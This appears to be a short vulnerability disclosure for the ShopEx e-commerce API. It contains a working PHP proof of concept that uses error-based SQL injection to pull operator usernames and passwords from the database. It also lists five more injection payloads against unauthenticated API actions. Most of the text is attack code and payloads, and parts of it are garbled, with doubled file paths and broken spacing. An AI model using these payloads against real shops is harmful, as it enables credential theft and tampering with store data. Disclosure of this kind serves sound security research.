Defect file: \ core \ api \ payment \ 2.0 \ api_ B2B _2_0_payment_cfg.phpcore \ api \ payment \ 1.0 \ api_ B2B _2_0_payment_cfg.php row 44th $ data ['columns '] is not filtered, leading to injection
<!--?php </p-->set_time_limit(0);ob_flush();echo 'Test: http://localhost:808'."\r\n";$sql = 'columns=* from sdb_payment_cfg WHERE 1 and (select 1 from(select count(*),concat((select (select (SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&disabled=1';$url='http://localhost:808/api.php?act=search_payment_cfg_list&api_version=2.0';$ch = curl_init();curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_URL,$url);curl_setopt($ch, CURLOPT_POSTFIELDS, $sql);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);flush();$data = curl_exec($ch);echo $data;curl_close($ch);?>
ShopEx does not authenticate the API operation module and can be accessed by any user. Attackers can use ShopEx to add product categories, types, specifications, and brands, deletion and modification. Improper filtering can also cause injection. injection 1: http://www.0day5.com/api.php POST act = search_sub_regions & api_version = 1.0 & return_data = string & p_region_id = 22 and (select 1 from (select count (*), concat (0x7c, (select (Select version () from information_schema.tables limit 0, 1), 0x7c, floor (rand (0) * 2) x from information_schema.tables group by x limit 0, 0) # injection 2: http://www.0day5.com/shopex/api.php act = add_category & api_version = 3.1 & datas = {"name": "name 'and 1 = x % 23"} injection 3: http://www.0day5.com/shopex/api.php act = get_spec_single & api_version = 3.1 & spec_id = 1 xxx injection 4: http://www.0day5.com/shopex/api.php act = online_pay_center & api_version = 1.0 & order_id = 1x & pay_id = 1 & currency = 1 injection 5: http://www.0day5.com/shopex/api.php act = search_dly_h_area & return_data = string & columns = xxxxx